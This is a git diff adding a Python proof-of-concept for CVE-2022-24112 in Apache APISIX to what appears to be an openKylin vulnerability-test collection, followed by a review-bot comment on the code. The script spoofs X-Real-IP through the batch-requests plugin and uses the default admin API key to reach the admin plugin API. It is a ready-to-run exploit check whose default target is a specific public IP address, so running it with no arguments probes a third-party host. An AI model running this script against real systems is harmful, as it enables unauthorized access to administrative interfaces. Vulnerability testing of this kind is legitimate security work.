diff --git a/cve/apache-APISIX/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112.py
new file mode 100644
index 0000000000000000000000000000000000000000..47aecefb71de28c1d55bb8cbca8de6465b6ea58d
--- /dev/null
+++ b/cve/apache-APISIX/CVE-2022-24112.py
@@ -0,0 +1,37 @@
+import requests
+from secrets import token_hex
+import argparse
+# Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE
+
+# get poc from biu ~
+
+def poc(host, port=443):
+ scheme = 'https' if '443' in str(port) else 'http'
+ target = '{}://{}:{}'.format(scheme, host, port)
+ token = token_hex(10)
+ uris = ['/apisix/batch-requests', '/api-gw/batch']
+ hits = [f'failed to load plugin {token}']
+ data = {"headers": {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'X-Real-IP': '127.0.0.1'},
+ 'pipeline': [{'path': f'/apisix/admin/plugins/{token}'}]}
+
+ try:
+ targets = ['{}{}'.format(target, uri) for uri in uris]
+ with requests.Session() as session:
+ for target in targets:
+ response = session.post(target, timeout=10, json=data, verify=False, proxies={'http': "http://127.0.0.1:8080"})
+ for hit in hits:
+ if hit in response.text:
+ output = response.json()
+
+ return True, host, target, output
+ except Exception as error:
+ return False
+ return False
+'''
+'''
+parser = argparse.ArgumentParser(description='test')
+parser.add_argument('--ip', type=str, nargs='?', default='183.66.101.103', help='IP地址')
+parser.add_argument('--port', type=int, nargs='?', default=9080, help='端口')
+args = parser.parse_args()
+print (poc(host=args.ip, port=args.port))
+
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 323454b7beb22c218ff26e79627829ece37c6ab0..6494fa06c8cc24cdc50c481eb31c438cb23943ce 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -4,6 +4,8 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + apache-APISIX: + - CVE-2022-24112 linux-kernel: - CVE-2021-4204 - CVE-2021-22555
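Review bot: The bare `except Exception as error: return False` in `poc` masks every transport failure — including the proxy error that is likely raised when nothing listens on the hard-coded `proxies={'http': "http://127.0.0.1:8080"}` — so a `False` result cannot be told apart from a host that was never reached, and `error` is never used. Narrow it and surface the cause, e.g. `except requests.RequestException as error:` / `print(f'request failed: {error}')` / `return False`, and consider making the proxy a command-line option rather than an always-on default. The `--ip` argument defaults to a specific public address, so running the script with no arguments sends requests to a third-party host; `parser.add_argument('--ip', type=str, required=True, help='IP地址')` avoids that. `'443' in str(port)` also classifies any port whose digits contain 443 (e.g. 4431) as HTTPS, which an explicit scheme option would make unambiguous. The empty `''' '''` literal before the parser setup is a no-op, and `poc` has no docstring; a one-line docstring stating that it returns `(True, host, url, json)` on a match and a bare `False` otherwise would document the mixed return shape.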